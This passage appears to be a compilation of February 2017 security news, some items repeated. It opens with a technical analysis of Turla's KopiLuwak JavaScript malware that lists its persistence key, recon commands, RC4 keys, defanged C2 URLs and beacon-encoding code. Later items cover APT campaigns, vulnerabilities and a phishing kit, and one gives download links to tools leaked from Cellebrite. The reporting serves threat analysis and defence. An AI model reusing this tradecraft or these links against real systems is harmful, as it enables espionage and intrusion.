The only function of mailform.js is to decode the third layer payload stored in the JavaScript file as a Base64 string. This string is Base64 decoded, then decrypted using RC4 with the key supplied above as a parameter (“NPEfpRZ4aqnh1YuGwQd0”). The end result is yet another JavaScript which is passed to the eval() function and executed.
Third Layer JavaScript
The third layer payload is where the C2 beaconing and system information collection is performed. This JS will begin by copying itself to the appropriate folder location based on the version of Windows running:
c:\Users\<USERNAME>\AppData\Local\Microsoft\Windows\mailform.js
c:\Users\<USERNAME>\AppData\Local\Temp\mailform.js
c:\Documents and Settings\<USERNAME>\Application Data\Microsoft\Windows\mailform.js
Persistence
Next, it will establish persistence on the victim by writing to the following registry key:
Key: HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\mailform
Value: wscript.exe /b “<PATH_TO_JS> NPEfpRZ4aqnh1YuGwQd0”
Profiling
After establishing its persistence, it will then execute a series of commands on the victim system using “cmd.exe /c” and store them to a file named “~dat.tmp”, in the same folder where “mailform.js” is located:
systeminfo
net view
net view /domain
tasklist /v
gpresult /z
netstat -nao
ipconfig /all
arp -a
net share
net use
net user
net user administrator
net user /domain
net user administrator /domain
set
dir %systemdrive%\Users\*.*
dir %userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*
dir %userprofile%\Desktop\*.*
tasklist /fi “modules eq wow64.dll”
tasklist /fi “modules ne wow64.dll”
dir “%programfiles(x86)%”
dir “%programfiles%”
dir %appdata%
Once the information is collected into the temporary “~dat.tmp” file, the JavaScript reads its contents into memory, RC4 encrypts it with the key “2f532d6baec3d0ec7b1f98aed4774843”, and deletes the file after a 1 second sleep, virtually eliminating storage of victim information on disk and only having an encrypted version in memory.
Network Communications
With the victim info stored in encrypted form in memory, the JavaScript then will perform the necessary callback(s) to the C2 servers which are hard coded in the payload. The addresses seen in this payload were as follows:
http://soligro[.]com/wp-includes/pomo/db.php
http://belcollegium[.]org/wp-admin/includes/class-wp-upload-plugins-list-table.php
It should be noted that the above domains appear to have been compromised by the actor based on the locations of the PHP scripts.
Belcollegium[.]org – a legitimate website compromised and used for C2
Victim data is sent to the C2 servers in the form of a POST request. The headers of the POST request contain a unique User-Agent string that will remain the same per victim system. The User-Agent string is created by performing the following steps:
Concatenate the string “KRMLT0G3PHdYjnEm” + <SYSTEM_NAME> + <USER NAME>
Use the above string as input to the following function (System Name and User Name have been filled in with example data ‘Test’ and ‘Admin’):
function EncodeUserAgent() {
var out = “”;
var UserAgent = ‘KRMLT0G3PHdYjnEm’ + ‘Test’ + ‘Admin’;
for (var i = 0; i < 16; i++) {
var x = 0
for (var j = i; j < UserAgent.length – 1; j++) {
x = x ^ UserAgent.charCodeAt(j);
}
x = (x % 10);
out = out + x.toString(10);
}
out = out + ‘KRMLT0G3PHdYjnEM’;
return out;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
function EncodeUserAgent() {
var out = “”;
var UserAgent = ‘KRMLT0G3PHdYjnEm’ + ‘Test’ + ‘Admin’;
for (var i = 0; i < 16; i++) {
var x = 0
for (var j = i; j < UserAgent.length – 1; j++) {
x = x ^ UserAgent.charCodeAt(j);
}
x = (x % 10);
out = out + x.toString(10);
}
out = out + ‘KRMLT0G3PHdYjnEM’;
return out;
}
The function above will produce a unique “UID” consisting of a 16-digit number with the string “KRMLT0G3PHdYjnEm” appended to the end. In the example above using the System Name “Test” and User Name “Admin”, the end result would be “2356406508689132KRMLT0G3PHdYjnEm”
Prepend the string “user-agent:”, “Mozilla/5.0 (Windows NT 6.1; Win64; x64); ” to the result from the last step. This will now be the unique User-Agent value for the victim callbacks. In this example, the final result will be “user-agent:”, “Mozilla/5.0 (Windows NT 6.1; Win64; x64); 2356406508689132KRMLT0G3PHdYjnEm”.
The POST request will contain the unique User-Agent string above as one of the headers and also the Base64 encoded version of the RC4 encrypted victim data collected earlier.
The C2 will respond in one of four ways after the POST request:
“good”
“exit”
“work”
“fail”
In the case of an answer of “good”, the JavaScript will then sleep for a random amount of time, ranging from 3600-3900 seconds.
The “exit” command will cause script to exit gracefully, thus shutting down the communications to the C2 server until next startup / login from the user.
The “fail” command is for uninstalling the JavaScript and its persistence. Both the “mailform.js” file and registry key created for persistence will be deleted upon receipt of this command.
The “work” command is used to task the victim’s system to run arbitrary commands via Wscript.shell.run(). It begins by checking to see if a file “mailform.pif” exists in the same directory as the JavaScript, and if so, it will delete it. The victim will then send a POST request to the C2 much in the same way as before with the beacon traffic, but with some slight differences. The User-Agent header will remain the same as in the beacon traffic, but the data sent to the C2 will consist of the 4-byte string “work”. If the response from the server after this acknowledgement is “200 OK”, then the system will proceed to read the response data into memory, RC4 encrypt it using the same key “2f532d6baec3d0ec7b1f98aed4774843”, then write it out to the “mailform.pif” file referenced above. The command file is run, the JavaScript will sleep for 30 seconds, and then the file is subsequently deleted.
Victims and Sinkholing
One of the domains involved in this new malware (soligro[.]com) expired in July 2016 and was was available for purchase and sinkhole at the time of the analysis. Sinkhole data shows several potential victims, with one high profile victim (195.251.32.62) located within the Greek Parliament:
The majority of connections to the sinkhole server have been observed from IP ranges residing within Greece. This leads us to believe the main target for the specific document above was Greece, although we also have indications of targeting in Romania and Qatar based on other data.
Conclusions
In recent months, the Turla actors have increased their activity significantly. The addition of KopiLuwak to their already existing ICEDCOFFEE JavaScript payload indicates the group continues to evolve and deliver new tools to avoid detection by known malware signatures.
Currently, it seems the Turla actors continue to rely heavily on embedded macros in Office documents. While this may appear to be an elementary technique to use for such a sophisticated actor, they are repeatedly successful in compromising high value targets with this method. It is advised that users disable macros in their enterprise and not allow the user to enable said content unless absolutely necessary. Furthermore, using the polymorphic obfuscation technique for the macros has caused difficulties in writing signatures for detection.
NATO Publishes Tallinn Manual 2.0 on International Law Applicable to Cyber Ops
4.2.2017 securityweek Cyber
NATO's Cooperative Cyber Defense Centre of Excellence (CCDCOE), based in Tallinn Estonia, has published 'Tallinn Manual 2.0 on the International Law Applicable to Cyber Operations.' Its world launch will be in Washington DC, February 8 at The Atlantic Council; followed by Europe at The Hague, February 13; and Tallinn, February 17.
Tallinn 2.0 incorporates Tallinn 1.0, published in 2012. While Tallinn 1 sought to define how international law relates to cyberwar, Tallinn 2 expands the content to include cyber activity that falls short of actual warfare. To reflect this expansion in content, the name has changed from 'applicable to cyber warfare' to 'applicable to cyber operations'.
Tallinn Manual 2.0 CoverThe Tallinn Manual takes no moral standpoint. It starts from the observation that cyber operations are subject to existing pre-cyber international law, and then defines how that law should be applied to different cyber operations. This forces it to confront many of the apparent difficulties in international cyber behavior head on -- such as the applicability of self-defense and the right to strike back, and attribution.
The Tallinn Manual process is led by Michael Schmitt, an expert in the law of armed conflict, Professor of Public International Law at Exeter Law School, and a Senior Fellow at the United States Naval War College. It is authored by nineteen international law experts. Although it has no legal standing and does not represent the views of NATO per se, it has become an influential resource for legal advisers dealing with cyber issues.
Schmitt told SecurityWeek that the Manual 1.0 publication became far more popular than was expected. He thought one reason was that it provided a legal position that didn't force governments to declare their own preference. "Governments," he suggested, "want to set legal bars high for potential aggressors while setting them as low as possible for themselves." The Manual takes away that dilemma be presenting the existing legal position under international law.
Tallinn Manual
Tallinn 2.0 expands this legal exploration beyond cyber warfare into civilian situations. This makes it more complex because it includes the multitude of cyber intrusions faced by commercial organizations every day. But it is international law rather than any national law that is explored.
For example, there is growing enthusiasm for the right for private industry to strike back at aggressors, almost as an extension of self-defense. The law, however, is relatively simple -- they cannot. Schmitt gave an example. "If a foreign nation launched an attack against Exeter University, there would be a right for retaliatory action; but not by Exeter University. The attack could be considered as an attack against the UK; but only the UK government could respond."
Attribution is another difficult area. The law cannot be applied against a transgressor if the transgressor is not definitively known. There have been attempts to develop acceptable methods of attribution; most notably perhaps by Microsoft. Microsoft's proposal would be for an international committee of independent experts who would decide on and name transgressors.
Schmitt is not a great supporter of this approach; not because it is bad, but because it ultimately depends on recommendations. The law is not about recommendations, but about clear mandates. "I don't know about technical attribution," he told SecurityWeek. "I've heard arguments that it is and it is not possible. But whenever I talk to intelligence agencies, they all say attribution is not based on simple technology, but on the summation of intelligence information -- signals intelligence, field agents, geopolitics and so on."
Once a government is confident in its attribution -- and particularly if other governments agree with that attribution -- then the Tallinn Manual can explain the legally permissible response.
Tallinn 2, explains the associated CCDCOE announcement, "covers a full spectrum of international law applicable to cyber operations ranging from peacetime legal regimes to the law of armed conflict, covering a wide array of international law principles and regimes that regulate events in cyberspace. Some pertain to general international law, such as the principle of sovereignty and the various bases for the exercise of jurisdiction. The law of state responsibility, which includes the legal standards for attribution, is examined at length. Additionally, numerous specialised regimes of international law, including human rights law, air and space law, the law of the sea, and diplomatic and consular law, are examined in the context of cyber operations."
Tallinn Manual 2.0 is available from Cambridge University Press.
Hacker leaked tools stolen from mobile forensics company Cellebrite
4.2.2017 thehackernews Mobil
The hacker that breached the systems of the mobile forensics company Cellebrite leaked online some tools and announced further releases.
In January the Israeli mobile phone data extraction company Cellebrite was hacked, the company went in the headlines in the dispute between Apple and the FBI in the case of the San Bernardino shooter’s iPhone.
The main product of the company is the Universal Forensic Extraction Device (UFED), an equipment that can rip data (i.e. SMS messages, emails, call logs) from a huge number of different models of mobile phones.
Cellebrite
The experts are still investigating the case, meantime Cellebrite has confirmed the security breach. The company confirmed that someone accessed its systems stealing roughly 900 Gb of data, a huge quantity of data mainly composed of log data from its end-user licensing system my.Cellebrite and other sensitive data. The archive includes also 350 Gb of offline world map backups, but attackers did not access “full passwords” or payment information. have not been obtained – although it has admitted that some password hashes have been stolen.
“Contrary to some erroneous reports, the attack did not impact any Cellebrite intellectual property related to the delivery of Cellebrite Forensic products and services, such as proprietary source code,” reads an announcement issued by the company.There is no increased risk to Cellebrite Forensic customers as a result of normal, ongoing use of Cellebrite UFED software and hardware, including routine software updates.”
According to the company, hackers accessed just some password hashes and information on closed technical support inquiries.
The hacker decided anyway to publish not only information contained in the archive, but also exploits for Android, iOS, and BlackBerry mobile devices.
According to Motherboard, the forensics expert Jonathan Zdziarski who analyzed the dump confiremed thay many of the exploits for iOS devices are widely available tools, for this reason he avoids to call them “exploits.”
The hacker promptly responded to Zdziarski via Pastebin, he confirmed that Apple tools are widely available, but also added that BlackBerry files are not publicly available.
“The more discerning eye will notice that some of the Apple exploits bear a remarkable resemblance to those available to any teenager interested in the jailbreaking scene perhaps not all those tax dollars have been wasted, the Blackberry epr is still worth a look at.” states the hacker.
“The files referenced here are part of the distribution package of our application and are available to our customers. They do not include any source code.” wrote a spokesperson for Cellebrite in an email sent to Motherboard.
“He added that the company monitors new research from academia and the information security community, including “newly published forensic methods, research tools and publicly documented issues, including “jailbreaks,” which enable platform research.”
The hacker plans to release a small sample of files retrieved via the weaponized Cellebrite update service deployed on MS Windows based devices and desktops (SYSTEM privs) within the customer infrastructure.
“Analysis of the compression and obfuscation employed by Cellebrite on products supplied to British MOD juxtaposed with the protection free versions supplied to SOCOM and others is also included within.” added the hacker.
The download links are:
https://mega.nz/#!sZUkSbDT!l740KTf5TG-TgjN-YNZcejSOfhUn43jZ8jR3Lw_w7dY
https://mega.nz/#!0d9zBQLI!DdKhZDXoMEnO6RpZDHWMGVV7nBXXZ98cPzjzVqLsVuw
Russian APT 29 group launched cyber attacks against Norwegian authorities
4.2.2017 securityaffairs APT
The Norwegian intelligence agency PST is one of the targets of spear phishing attacks launched by the Russian APT 29 group.
The dreaded Russian APT 29 group is back, the Norwegian authorities accuse Russia of cyber attacks that hit the foreign ministry, intelligence and other institutions.
“Nine different email accounts were targeted in an attempt at what is called spear phishing, in other words malicious emails,” confirmed Arne Christian Haugstoyl, an official with Norway’s intelligence service PST, in an interview with the television channel TV2.
The Norway was informed of ongoing attacks by an allied state, it is currently investigating the case, but it is still unclear which was the motivation behind the attack.
“It’s difficult to know what the goal” he added.
Despite legislative elections are scheduled for September 2017, experts believe that the attacks are not linked to the vote.
The APT 29 group is likely interested in the Norway NATO membership, especially in the wake of the Ukraine crisis.
Recently the Norwegian Government also allowed the deployment of 300 US soldiers on its soil.
The Norwegian official confirmed that the APT 29 group has links to the Russian authorities, the hackers area also accused to have interfered with the recent US Presidential Election.
APT 29 group Norway
At the time I was writing it is not clear if the hackers have exfiltrated sensitive information, according to the Verdens Gang (VG), the PST spokesman Martin Bernsen said there was “no reason to believe that classified information had been obtained in connection with the attack.”
According to the Norwegian Government, the hackers also targeted the national radiation protection agency, the parliamentary group of the Labour party and a school.
Recently Moscow refused visas to two senior Norwegian lawmakers, a decision considered by the Government of Oslo as “unjustifiable”.
Moscow explained the visa refusal was its response to Norway’s position on the EU economic sanctions against Russia over the Ukraine crisis.
Windows SMB 0-Day Exposes Systems to Attacks
3.2.2017 securityweek Vulnerebility
A 0-day memory corruption vulnerability discovered in the SMB (Server Message Block) protocol can be exploited to cause denial of service or potentially execute arbitrary code on a vulnerable system.
According to the United States Computer Emergency Readiness Team (US-CERT), which has already published an advisory on the matter, the bug resides in the manner in which Windows handles SMB traffic and can be exploited by remote, unauthenticated attackers for nefarious purposes.
SMB (one of its versions was also known as Common Internet File System, or CIFS), operates as an application-layer network protocol designed to allow machines to access files, printers, serial ports, and miscellaneous communications between nodes on a local network, while also offering an authenticated inter-process communication mechanism.
According to US-CERT, the Windows platform fails to properly handle a server response containing too many bytes following the structure defined in the SMB2 TREE_CONNECT Response structure. Thus, when a vulnerable Windows client system connects to a malicious SMB server, it can crash (Black Screen of Death or BSOD) in mrxsmb20.sys.
The advisory also notes that the vulnerability has been already confirmed as being exploitable in denial of service attacks, but that it’s not clear whether it could be exploited further. By exploiting the vulnerability, an attacker might also be able to execute arbitrary code with Windows kernel privileges, US-CERT warns.
“We have confirmed the crash with fully-patched Windows 10 and Windows 8.1 client systems. Note that there are a number of techniques that can be used to trigger a Windows system to connect to an SMB share. Some may require little to no user interaction,” the advisory also notes.
With exploit code for the vulnerability already publicly available but no practical solution to this problem known at this time, suggested workarounds include blocking outbound SMB connections (TCP ports 139 and 445 along with UDP ports 137 and 138) from the local network to the WAN.
The vulnerability has a base Common Vulnerability Scoring System (CVSS) score of 10.0. It has been publicly reported by @PythonResponder, who says that Windows Server 2012 and 2016 versions are also affected. Proof-of-concept code has been published on GitHub.
Chinese Cyberspies Target Russia With New Malware
3.2.2017 securityweek Virus
A China-linked cyber espionage group has been using new malware and new techniques in attacks aimed at military and aerospace organizations in Russia and Belarus.
In July 2016, security firm Proofpoint reported that the threat actor had been using NetTraveler (aka TravNet) and the PlugX RAT to target Russia and neighboring countries. Researchers now revealed that, at around the same time, the group started using a new downloader, dubbed ZeroT, and Microsoft Compiled HTML Help (.chm) files to deliver PlugX.
Attackers sent victims .chm files containing an HTM file and an executable. When the help file is opened, a Russian-language text is displayed and the victim is asked by the User Account Control (UAC) feature in Windows to allow the execution of an “unknown program.” If the user clicks “Yes,” the ZeroT downloader is dropped onto the system.
Similar to earlier attacks, the APT actor also used specially crafted Word documents created with an exploit generator named MNKit. This Office exploit generator has allowed researchers to find connections between several different groups believed to be operating out of China.
The emails and files used as bait often referenced the Commonwealth of Independent States (CIS), which is an alliance of former Soviet Union countries, Russian government programs, and Russia’s defense industry.
The threat group has also used self-extracting RAR archives to deliver ZeroT. Many of these archives included an executable named “Go.exe,” which leverages the Event Viewer tool in Windows to bypass UAC.
Once it infects a system, ZeroT contacts its command and control (C&C) server, and uploads information about the infected system. ZeroT then downloads a previously known variant of the PlugX RAT, either directly as a non-encoded PE payload or as a Bitmap (.bmp) image file that uses steganography to hide the malware.
Proofpoint said the C&C domains used by ZeroT have also been seen in NetTraveler attacks. The PlugX samples leveraged some of the C&C domains observed in a 2015 campaign.
Following the indictment of People's Liberation Army (PLA) officers, threats of economic sanctions, and the agreement made by the U.S and China in 2015, security firms reported that the volume of Chinese attacks aimed at the United States dropped significantly.
However, researchers pointed out that China-linked threat groups have continued to target other regions, such as Europe and Russia.
Norway Accuses Russia of Cyberattack
3.2.2017 securityweek Cyber
Oslo - Norway's foreign ministry, army and other institutions were targeted in a recent cyberattack by a group suspected of ties to Russian authorities, Norwegian intelligence -- which was among the targets -- said Friday.
Known as APT 29, the group singled out by Oslo has already been accused of hacking interference in the US election last year.
"Nine different email accounts were targeted in an attempt at what is called spear phishing, in other words malicious emails," Arne Christian Haugstoyl, an official with Norway's intelligence service PST, told television channel TV2.
"It's difficult to know what the goal" of the operation was, he said, adding that Norway was alerted to the attack by an allied country.
He described APT 29 as a group "with links to the Russian authorities".
PST spokesman Martin Bernsen, quoted by daily Verdens Gang (VG), said there was "no reason to believe that classified information had been obtained in connection with the attack."
In addition to the foreign ministry, the army and PST itself, the attack -- the date of which was not disclosed -- also targeted the Norwegian radiation protection agency, a school and the parliamentary group of the Labour party, the traditionally dominant political party in Norway but which is currently in opposition.
Legislative elections are scheduled for September 11, though no link has been made to the vote.
Norway, a NATO member, and its neighbor Russia normally enjoy good relations but ties have grown more tense in the wake of the Ukraine crisis.
The Scandinavian country on Wednesday summoned the Russian ambassador to lodge a protest after Moscow refused visas to two senior lawmakers in a move Oslo denounced as "unjustifiable".
Russia said the visa refusal was a reaction to Norway's participation in EU economic sanctions against it over the Ukraine crisis.
Moscow was also angered by the recent deployment of some 300 US soldiers on Norwegian soil.
Several Flaws Patched in Honeywell Controllers
3.2.2017 securityweek Vulnerebility
Honeywell has released updates for its XL Web II controllers to address several critical and high severity vulnerabilities that can be exploited remotely from the Internet.
XL Web II or Excel Web II controllers, which are also sold under the Falcon brand, are web-based SCADA (supervisory control and data acquisition) systems designed for building management applications.
Security researcher Maxim Rupp discovered last summer that the product is affected by flaws that allow a remote attacker to obtain sensitive information and use the affected system as an entry point into the targeted organization’s network.
Rupp told SecurityWeek that, using the Shodan search engine, he has identified more than 600 vulnerable devices accessible from the Internet.Vulnerabilities in Honeywell Excel Web controllers
ICS-CERT has published an advisory describing the vulnerabilities, but the researcher says there are some inaccuracies. According to the expert’s own report, the flaws affect XL20xxBxx controllers running firmware version XLWeb2_vUBC_3-04-04-07 and prior, and CLEA20xxBxx devices running firmware version Eagle_vUBC_3-04-04-07 and prior.
The most serious of the flaws, rated critical based on their CVSS score, are related to exposed credentials. The expert discovered that the application stores passwords in easily accessible JavaScript files for client-side verification (CVE-2017-5140). These passwords are stored in clear text (CVE-2017-5139) and an attacker can access them without authentication.
2017 Singapore ICS Cyber Security Conference Call for Papers is Open!
Another vulnerability rated critical is an improper privilege management issue (CVE-2017-5142) that allows a user with limited privileges to access certain functions simply by navigating to a specific URL. These functions are normally accessible only to users with higher privileges.
Rupp has also discovered a high severity path traversal flaw (CVE-2017-5143) that allows an unauthenticated attacker to gain access to files that can contain sensitive information.
ICS-CERT’s advisory also mentions a medium severity session fixation flaw that could allow an attacker to gain access to a targeted user’s account (CVE-2017-5141). Rupp said this vulnerability was not included in his report and that it likely refers to a combination of weaknesses.
According to the researcher and ICS-CERT, Honeywell addressed the vulnerabilities with the release of version 3.04.05.05. Users can obtain the patches by contacting their vendor. There is no evidence that the flaws have been exploited in the wild.
Chinese state-sponsored hackers targets Russia and Belarus with ZeroT and PlugX
3.2.2017 securityaffeirs Hacking
According to the firm ProofPoint, Chinese state-sponsored actors continues to spy on military and aerospace organizations in Russia and Belarus.
Chinese state-sponsored actors are spying on military and aerospace interests in Russia and Belarus. According to the experts from Proofpoint, the attacks began in the summer of 2016, the Chinese hackers launched a spear-phishing campaign leveraging a new downloader known as ZeroT in order to deliver the PlugX RAT.
Researchers explained that in the past the same threat actors conducted spear-phishing campaigns using Microsoft Word document attachments that were able to trigger the CVE-2012-0158, or containing malicious URLs pointing to .rar-compressed executable nasties.
The Proofpoint analysis revealed that Russian firms are among the targets of the group.
The Chinese hackers switched tactics for spying on Russian jet makers once completed the development of the ZeroT malware.
“Most recently, we have observed the same group targeting military and aerospace interests in Russia and Belarus.” reads the analysis published by ProofPoint. “Since the summer of 2016, this group began using a new downloader known as ZeroT to install the PlugX remote access Trojan (RAT) and added Microsoft Compiled HTML Help (.chm) as one of the initial droppers delivered in spear-phishing emails.”
This analysis of ZeroT malware revealed it used obfuscation techniques to avoid the detection, a significant number of samples analyzed by the expert contained the file named Go.exe which allows the Windows UAC bypass.
ZeroT communicates with the C&C server over HTTP, it also uses a fake User-Agent in all the requests.
“Mozilla/6.0 (compatible; MSIE 10.0; Windows NT 6.2; Tzcdrnt/6.0)”, with “Tzcdrnt” possibly being a typo of “Trident.” In all the samples we observed, ZeroT first beacons to index.php expecting an RC4-encrypted response using a static key: “(*^GF(9042&*”. continues the analysis
Chinese nation-state hackers tied the PLA already targeted in the past US and European firms in the aerospace industry.
Chinese hackers were behind the cyber espionage campaign on the Lockheed Martin F-35 Joint Strike Fighter that caused the arrest of a Chinese national.
On July 2016, US sentenced the Chinese hacker involved in the theft of industrial secrets on the F-22 and F-35 fighter jets, C-17 transport aircraft and F-35 aircraft.
Military experts know very well that many Russian and US jets were almost identical to the once developed by China.
Authentication Bypass Vulnerability found in Cisco Prime Home product
3.2.2017 securityaffeirs Vulnerebility
The experts at Cisco have discovered a critical authentication bypass vulnerability in the Cisco Prime Home during an internal security testing.
Cisco has released a security update for CISCO Prime Home remote management and provisioning solution to fix a flaw that could be exploited to authentication bypass. The experts at Cisco have discovered the critical authentication bypass flaw during an internal security testing.
The Cisco Prime Home is a product used by Internet service providers (ISPs) to view customers’ home networks, it allows to make configuration changes and software upgrades, and could be used for the remote diagnostics.
The flaw, tracked as CVE-2017-3791, resides in the web-based user interface of the Cisco Prime Home, it can be remotely exploited by an unauthenticated attacker to bypass authentication and execute any action with administrator privileges.
“The vulnerability is due to a processing error in the role-based access control (RBAC) of URLs. An attacker could exploit this vulnerability by sending API commands via HTTP to a particular URL without prior authentication.” states the Cisco advisory. “An exploit could allow the attacker to perform any actions in Cisco Prime Home with administrator privileges.”
The flaw affects Cisco Prime Home versions 6.3, 6.4 and 6.5, versions 5.2 and earlier are not impacted. Cisco fixed the issue with the version 6.5.0.1, It is important to highlight the absence of a workaround.
The experts at the Cisco Product Security Incident Response Team (PSIRT) are not aware of any public announcements or exploitation of the flaw.
Hacker Leaks Tools Stolen From Cellebrite
3.2.2017 securityweek Hacking
The hacker who recently breached the systems of Israel-based mobile forensics company Cellebrite leaked some tools on Thursday and promised to dump more of the stolen data in the future.
While its investigation is still ongoing, Cellebrite has confirmed that someone had gained unauthorized access to its systems, stealing roughly 900 Gb of data.
According to the company, most of the data represents logs from its end-user licensing system my.Cellebrite and other unimportant files, such as 350 Gb of offline world map backups.
The compromised data does include customer contact information from a my.Cellebrite backup, but the company says “full passwords” or payment information have not been obtained – although it has admitted that some password hashes have been stolen.
Cellebrite also admitted that the hacker gained access to information on technical support inquiries, but claims the exposed files are not related to open support cases.
“Contrary to some erroneous reports, the attack did not impact any Cellebrite intellectual property related to the delivery of Cellebrite Forensic products and services, such as proprietary source code,” the company stated. “There is no increased risk to Cellebrite Forensic customers as a result of normal, ongoing use of Cellebrite UFED software and hardware, including routine software updates.”
In an effort to prove that he had stolen much more than just basic contact information, the hacker leaked what he claims to be “exploits” for iOS, Android and BlackBerry devices.
The download links no longer work, but Vice’s Motherboard learned from forensics expert Jonathan Zdziarski that many of the leaked iOS-related files appear to be widely available tools from the jailbreaking community. Zdziarski said he would not call the leaked files “exploits.”
In a message posted on Pastebin, the hacker admitted that the Apple tools are widely available, but claimed that the BlackBerry tools are “worth a look at.”
Cellebrite told Motherboard that the tools leaked this week are part of the distribution package of its application, but reiterated that source code was not compromised.
The hacker said he also plans on leaking what he describes as “a sample of files retrieved via the weaponized Cellebrite update service deployed on MS Windows based devices and desktops (SYSTEM privs) within the customer infrastructure.”
Chinese Cyberspies Target Russia With New Malware
3.2.2017 securityweek Virus
A China-linked cyber espionage group has been using new malware and new techniques in attacks aimed at military and aerospace organizations in Russia and Belarus.
In July 2016, security firm Proofpoint reported that the threat actor had been using NetTraveler (aka TravNet) and the PlugX RAT to target Russia and neighboring countries. Researchers now revealed that, at around the same time, the group started using a new downloader, dubbed ZeroT, and Microsoft Compiled HTML Help (.chm) files to deliver PlugX.
Attackers sent victims .chm files containing an HTM file and an executable. When the help file is opened, a Russian-language text is displayed and the victim is asked by the User Account Control (UAC) feature in Windows to allow the execution of an “unknown program.” If the user clicks “Yes,” the ZeroT downloader is dropped onto the system.
Similar to earlier attacks, the APT actor also used specially crafted Word documents created with an exploit generator named MNKit. This Office exploit generator has allowed researchers to find connections between several different groups believed to be operating out of China.
The emails and files used as bait often referenced the Commonwealth of Independent States (CIS), which is an alliance of former Soviet Union countries, Russian government programs, and Russia’s defense industry.
The threat group has also used self-extracting RAR archives to deliver ZeroT. Many of these archives included an executable named “Go.exe,” which leverages the Event Viewer tool in Windows to bypass UAC.
Once it infects a system, ZeroT contacts its command and control (C&C) server, and uploads information about the infected system. ZeroT then downloads a previously known variant of the PlugX RAT, either directly as a non-encoded PE payload or as a Bitmap (.bmp) image file that uses steganography to hide the malware.
Proofpoint said the C&C domains used by ZeroT have also been seen in NetTraveler attacks. The PlugX samples leveraged some of the C&C domains observed in a 2015 campaign.
Following the indictment of People's Liberation Army (PLA) officers, threats of economic sanctions, and the agreement made by the U.S and China in 2015, security firms reported that the volume of Chinese attacks aimed at the United States dropped significantly.
However, researchers pointed out that China-linked threat groups have continued to target other regions, such as Europe and Russia.
SQL Slammer Worm Crawls Back
3.2.2017 securityweek Virus
SQL Slammer, a tiny worm that managed to wreak havoc across the Internet on January 25, 2003, appears to have recommenced activity, Check Point security researchers warn.
The computer worm was first spotted on the day it caused a denial of service condition on tens of thousands of servers worldwide by overloading Internet objects such as servers and routers with a massive number of network packets. Within 10 minutes of its first emergence, SQL Slammer had managed to infect most of its roughly 75,000 victims.
SQL Slammer was based on proof-of-concept code demonstrated at the Black Hat Briefings by David Litchfield, who discovered a buffer overflow bug in Microsoft's flagship SQL Server and Desktop Engine database products. Although the vulnerability had been patched by Microsoft six months before the worm hit, many installations weren’t patched, and the malicious code could easily propagate.
Also referred to as the Sapphire Worm and Helkern, SQL Slammer is only 376 bytes in size, thus fitting inside a single packet, a feature that allowed it enjoy rapid propagation when it hit. The worm was sending a formatted request to UDP port 1434 and was causing infected routers to start sending the malicious code to random IP addresses, which resulted in a denial of service condition on targets.
Although it remained dormant for over a decade, SQL Slammer appears to have restarted activity, Check Point security researchers warn. According to data collected by Check Point, there was a massive increase in the number of attack attempts between November 28 and December 4, 2016. SQL Slammer was one of the top malware detected in the timeframe.
(Image Credit: Check Point)
The number of destination countries of the observed attack attempts was of 172 countries, with 26% of the attacks targeting networks in the United States. According to Check Point, this data shows that the newly recorded SQL Slammer activity wasn’t a targeted attack, but rather a larger wave of attacks.
The security firm also notes that the largest number of attack attempts came from IP addresses located in China, Vietnam, Mexico, and Ukraine.
“To summarize, although the Slammer worm was primarily spread during 2003, and has barely been observed in the wild over the last decade, the massive spike in propagation attempts that was observed in our data leads us to wonder – is the worm trying to make a comeback?” Check Point concludes.
PayPal Phishing Attack Immediately Verifies Credentials
3.2.2017 securityweek Phishing
A newly observed phishing campaign targeting PayPal users employs checks to immediately verify whether the entered login credentials are legitimate or not, Proofpoint reveals.
Using email as the distribution method, attackers lured users to a well-crafted phishing page that appeared to be a legitimate PayPal login page, but was actually the first step in an elaborate scheme meant to trick users into revealing their banking and personal information. (The attack is different from a separate sophisticated phishing campaign targeting PayPal users detailed earlier this week.)
The phishing page, researchers say, returns a “vaguely worded error message” if the wrong credentials are entered, something that doesn’t usually happen with phishing landing pages, as they tend to accept any credentials that users enter. The newly observed page, however, verifies the entered credentials with PayPal before moving forth with the scheme.
To perform the check, the crooks were using a decommissioned service in PayPal, meant to allow one to purchase a gift card from a user. “If the queried email account does not exist, the login supplied to the phishing landing page is discarded, helping to ensure that the phisher gets a higher percentage of valid credentials. The code does not check the password, only that the email account exists on PayPal,” Proofpoint researchers note.
Usually, scammers verify the stolen credentials after they managed to acquire a larger number of potential logins, but the new approach eliminates the need to perform the validation at a later date. On top of that, researchers say, this specific approach can fool automated analysis tools.
Once a valid PayPal email address is used, the victim is presented with a reassuring welcome page, followed by a phishing page on which users are required to confirm the credit card information they have associated with their PayPal account. Because the phishing kit comes with support for multiple languages, it can appear legitimate to users in many locations.
The phishing kit was also designed to check the credit card number that the victim supplies, making sure it passes the Luhn algorithm, as well as to perform a lookup against the card number to retrieve additional information. After validating the credit card, the kit asks the victim to enter security information about their card.
Users are also asked to link their bank accounts to their PayPal account, and are offered a number of well-known retail banks to choose from. Stolen bank branding gives the phishing page a legitimate look. Next, the user is asked to enter login credentials for their bank, claiming that the information is not saved, which is, of course, fraud.
“The user is then prompted for routing information for the bank account. Finally, the phishing kit prompts the user for identity information such as a driver's license number or other identifying document that can be uploaded directly to the phishing kit. If the victim clicks the ‘Don't have your ID now?’ button, they simply skip this screen,” Proofpoint said.
After attempting to gather all of the aforementioned personal and financial information from the victims, the phishing kit then redirects them to the legitimate PayPal website. According to Proofpoint, in addition to using inventive phishing pages, the scheme uses an administrative backend similar to what remote access Trojans (RATs) usually employ.
Through this panel, attackers can view visitor information, the option to access stolen credentials, and a simple interface for the administrator to modify settings. There is even the option to enable a “selfie page” where Flash is used to interact with the victim's webcam, most probably to allow the phisher to snap a photo of the victim for later use. The admin panel even features a page for Trojans, but the feature appears to be under development.
“As attackers continue to turn away from the use of exploits and other means of compromising victim PCs and stealing information via malware, they are developing increasingly sophisticated means of collecting credentials and other data directly through phishing schemes. The use of phishing kits like the one detailed here provides threat actors with ready access to turnkey templates and administrative backends that make harvesting data from unsuspecting victims all too easy,” Proofpoint says.
The phishing kit also illustrates the advanced state of “crimeware as a service” and how straightforward conducting phishing scams can be. The existence of an admin panel with the aforementioned options is quite rare among credential phishing kits at the moment, but similar panels were previously associated with APT activities. However, this type of admin panel is expected to become more common and, understandably, popular with phishing actors, Proofpoint concludes.
